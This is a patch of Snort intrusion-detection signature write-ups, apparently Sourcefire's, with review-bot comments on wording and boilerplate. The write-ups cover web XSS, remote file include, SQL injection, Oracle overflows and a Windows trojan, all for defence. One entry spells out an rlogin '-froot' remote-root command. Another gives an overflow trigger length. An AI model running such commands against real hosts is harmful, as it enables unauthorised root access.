+Rule:
+
+--
+Sid:
+1288
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion. In particular this rule generates events when the directory
+_vti_bin is accessed. This directory contains sensitive files that may
+be utilized in an attack against the server.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+A user who is using the "discuss" toolbar in Microsoft Internet Explorer
+may inadvertently generate an event from this rule, due to the browser
+making a check for Office Server Extensions. See this URI for more
+details.
+
+ http://www.webmasterworld.com/forum39/2158.htm
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
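Review bot: Additional References is empty although Detailed Information states that "Many known vulnerabilities exist for this platform" and the False Positives section already cites an external URI; add the relevant vendor advisory links for FrontPage Server Extensions so the reader can check which issues the _vti_bin access check is meant to cover. Also "arbitrary code of the attackers choosing" in Impact should be "attacker's".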
--- /dev/null
+++ b/doc/signatures/100000484.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000484
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Confixx" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "lpath" parameter in the "ftp_index.php" script 
+used by the "Confixx" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Confixx
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
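Review bot: the Impact section ("Possible unauthorized administrative access to the server", "Possible execution of arbitrary code of the attackers choosing") does not match the cross site scripting issue that Summary and Attack Scenarios describe ("steal information from a user clicking on that link"); it is the boilerplate used for the remote file include and SQL injection SIDs in this patch and should be reduced to the client-side impact of XSS (script execution in the victim's browser, theft of session data or credentials). Layout: the "--" separators after Sid, after Affected Systems and after Contributors lack the blank line that precedes every other separator in this file.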
--- /dev/null
+++ b/doc/signatures/100000713.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000713
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "roster.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "roster.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
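Review bot: the third Detailed Information paragraph ("validating the credentials of a client host") and the Attack Scenarios text ("supply his/her own credentials to gain access") describe an authentication bypass, which is not the remote file include via the "phpraid_dir" parameter of "roster.php" that the Summary describes; drop that boilerplate or replace it with the include scenario the Summary already states. Also "running ona web server" should read "running on a web server", and the two blank lines at the top of the file are not present in the sibling files.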
--- /dev/null
+++ b/doc/signatures/609.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 609
+
+--
+Summary: 
+This event is generated due to the use of a suspicious login attempt
+
+-- 
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rsh" whilst passing the parameter "-froot".
+
+A bug in some implementations of the "rsh" daemon software allowed remote root access using the "-froot" parameter for the "rsh command"
+
+--
+Attack Scenarios: 
+If a UNIX machine has the "rsh" service running and is vulnerable to this bug, in can be exploited simply by running the "rsh" command with "-froot" flag. For example, rlogin host.foo.com -l -froot
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+Disable the "rsh" service if not used, apply a patch if appropriate.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113
+
+Arachnids:
+http://www.whitehats.com/info/IDS387
+
+--
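Review bot: Detailed Information refers to the "rsh" daemon and the "rsh command", but the example in Attack Scenarios is "rlogin host.foo.com -l -froot" and Corrective Action says "instead of rlogin"; state the service consistently (the CVE-1999-0113 entry listed under Additional References is the place to confirm which one), or say explicitly that the rule matches the "-froot" string regardless of the client used. Also "in can be exploited" should read "it can be exploited", the second Detailed Information sentence lacks a terminating period, and the Summary "due to the use of a suspicious login attempt" would read better as "when a suspicious login attempt is made".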
--- /dev/null
+++ b/doc/signatures/100000555.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000555
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "lid" parameter in the "error.php" script used 
+by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
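Review bot: as with the other cross site scripting SIDs in this patch, Impact ("unauthorized administrative access to the server", "execution of arbitrary code") overstates what reflected XSS through the "lid" parameter of "error.php" gives an attacker; Attack Scenarios itself states the real effect ("steal information from a user clicking on that link"), so Impact should be aligned with that. The "--" separators after Sid, Affected Systems and Contributors are also missing the preceding blank line used elsewhere in the file.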
--- /dev/null
+++ b/doc/signatures/158.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+152, 157-158
+
+--
+Summary:
+Backdoor.Backconstruction is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Backconstruction
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+	SID	Message
+	---	-------
+	152	BackConstruction 2.1 Connection (outgoing TCP
+connection)
+	157	BackConstruction 2.1 Client FTP Open Request (incoming
+TCP connection)
+	158	BackConstruction 2.1 Server FTP Open Reply (outging TCP
+connection)
+
+This Trojan is commonly used to install other Trojan programs.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Cmctl32.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Shell = "<drive>:\WINDOWS\Cmctl32.exe"
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Cmctl32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS505
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/backc/21/index.shtml
+
+Pest Patrol:
+www.pestpatrol.com/PestInfo/b/back_construction.asp
+
+--
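Review bot: the SID/Message table in Detailed Information is broken by hard wraps inside the entries ("(outgoing TCP" and "connection)" on separate lines, likewise for 157 and 158), so the tab alignment of the two columns is lost; keep each row on one line or shorten the messages. Typos: "Backconstruction sever" should be "server", "outging" should be "outgoing". The file is named 158.txt but the Sid line reads "152, 157-158"; if this one document is meant to cover all three SIDs, say so in the Summary, which currently only states "Backdoor.Backconstruction is a Trojan Horse". The server path "<drive>:\WINDOWS\Cmctl32.exe" is placed under Ease of Attack; it belongs in Detailed Information next to the registry change, where Corrective Action already repeats it.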
--- /dev/null
+++ b/doc/signatures/3443.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3443
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
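Review bot: the document never says which rules this non-alerting SID supports, which is the one thing a reader of a "does not generate an event" entry needs; name the dependent rules in Detailed Information instead of repeating the Summary verbatim there. Typos in both Summary and Detailed Information: "false postives" should be "false positives", "occuring" should be "occurring".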
--- /dev/null
+++ b/doc/signatures/2892.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2892
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nvarchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
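Review bot: the last Detailed Information paragraph has a line break between the procedure name and the following period ("drop_priority_nvarchar2" then ". This procedure is included in"), which reads like an unfilled template field; join it as "vulnerability in the procedure drop_priority_nvarchar2. This procedure is included in sys.dbms_repcat_conf." Also "Oracle Oracle9i" under Affected Systems repeats the vendor name, and Additional References is empty for an issue whose only Corrective Action is "Apply the appropriate vendor supplied patch"; add the vendor alert so the reader can find that patch.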
--- /dev/null
+++ b/doc/signatures/100000648.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000648
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "whos.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "whos.php" script 
+used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
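Review bot: "may indicate that an exploitation attempt has been attempted" in the Summary is redundant; "may indicate an exploitation attempt" says the same. The third Detailed Information paragraph ("validating the credentials of a client host") and the Attack Scenarios text ("supply his/her own credentials") are authentication-bypass boilerplate that does not describe a remote file include through "admin_template_path" in "whos.php"; replace them with the include scenario the Summary states. Typo: "running ona web server".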
--- /dev/null
+++ b/doc/signatures/100000510.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000510
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "rank.php" with SQL commands being passed as the "MemberID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "MemberID" parameter in the "rank.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
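Review bot: the second Detailed Information paragraph is a comma splice: "compromise the database backend for the application, the attacker may also be able to execute" needs a full stop or semicolon before "the attacker". The third paragraph (client credential validation, escalated privileges) is boilerplate that does not apply to SQL injection through the "MemberID" parameter of "rank.php"; Attack Scenarios already has the right description ("inject SQL commands to the backend database ... if user input is not correctly sanitized"), so Detailed Information should say the same and drop the credential text. Typo: "running ona web server".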
--- /dev/null
+++ b/doc/signatures/898.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+898
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
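Review bot: neither Summary nor Detailed Information names the CGI script or URI this SID matches, so a reader cannot tell what traffic triggers it or judge the "None known" False Positives claim; state the matched path in Detailed Information, as the application-specific files in this patch do (100000648.txt, for example, names "whos.php" and its parameter). Formatting: the line ending "can be exploited by the attacker." runs well past the wrap width of the rest of the paragraph, and "ona web server" should be "on a web server".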
--- /dev/null
+++ b/doc/signatures/2669.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2669
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+ibillpm.pl.
+
+-- 
+Impact: 
+Possible unauthorized administrative access to the victim host.
+Information disclosure.
+
+--
+Detailed Information:
+The script ibillpm.pl is used to process billing and payment via a CGI
+application over the Internet.
+
+The application suffers from a weak default password scheme that could
+be used by an attacker to take control of a user account and view
+billing details.
+
+--
+Affected Systems:
+	iBill Internet Billing Company Processing Plus
+
+--
+Attack Scenarios: 
+An attacker can supply the username and default password for a user to
+the script to gain control.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script ibillpm.pl
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
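Review bot: Corrective Action ("Uninstall the script ibillpm.pl", "Only allow usage from authenticated users") does not address the weakness Detailed Information identifies, a "weak default password scheme"; add the direct mitigation, changing the default passwords on all accounts and enforcing strong ones, and list it first, since removing a billing script is rarely an option. The two Corrective Action lines also lack terminating periods, unlike the rest of the file, and Additional References is empty; the vendor advisory for Processing Plus would let the reader confirm affected versions.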
--- /dev/null
+++ b/doc/signatures/2554.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2554
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
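Review bot: the version strings under Affected Systems contain stray spaces ("10g 9.0.4 .0", "2.0 .0.4", "9.0.2 .3", "9.0.2 .2", "9.0.3 .1"), which look like a field-merge artifact; presumably they should read 9.0.4.0, 2.0.0.4, 9.0.2.3, 9.0.2.2 and 9.0.3.1. "Oracle Oracle9i" repeats the vendor. The False Negatives note about ports 7777 and 7778 is the only place the rule's port scope is stated; consider repeating that sentence in Detailed Information. The extra blank lines after the "-- " separators before Impact, Attack Scenarios, Ease of Attack, False Positives and Corrective Action differ from the rest of the patch.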
--- /dev/null
+++ b/doc/signatures/1083.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1083
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
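Review bot: Detailed Information for this SID is generic ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion") and never says what request content the rule matches, so "All systems using a web server." under Affected Systems is the only scoping the reader gets; state the matched URI or pattern and narrow Affected Systems to the products it applies to. Typo: "attackers choosing" in Impact should be "attacker's".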
--- /dev/null
+++ b/doc/signatures/100000820.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000820
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "SaPHPLesson" application running on a webserver. Access to the file "add.php" with SQL commands being passed as the "forumid" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "forumid" parameter in the "add.php" script used by the "SaPHPLesson" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SaPHPLesson
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
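Review bot: the Summary and Detailed Information text here is the same as in 100000510.txt earlier in this patch except that it is left on single long lines instead of being wrapped at about 80 columns; wrap it the same way. The second Detailed Information paragraph has the same comma splice ("for the application, the attacker may also be able to"), the third paragraph's credential-validation boilerplate does not describe SQL injection via the "forumid" parameter of "add.php", and "ona web server" should be "on a web server".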
--- /dev/null
+++ b/doc/signatures/1353.txt
@@ -0,0 +1,46 @@
+Rule:
+
+--
+Sid:
+1353
+
+--
+Summary:
+Attempted nasm command access via web. 
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a program source on a host. NASM is the Netwide Assembler which is capable of compiling a variety of sources on a variety of platforms into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/nasm'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+--
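Review bot: the Corrective Action sentence "setting the systems runtime securelevel also prevents the securelevel from being changed" is circular; the point is that at a raised securelevel the system immutable flag set on files cannot be cleared and the securelevel itself cannot be lowered, which is what the parenthetical "(note: the securelevel can only be increased)" is trying to say. Also "it's designated web root" should be "its", "compiile" should be "compile", and "'/bin/nasm'in the URI" is missing a space. The file has no Affected Systems section, and the "--" before Contributors lacks the blank line used before every other separator.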
--- /dev/null
+++ b/doc/signatures/2780.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2780
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
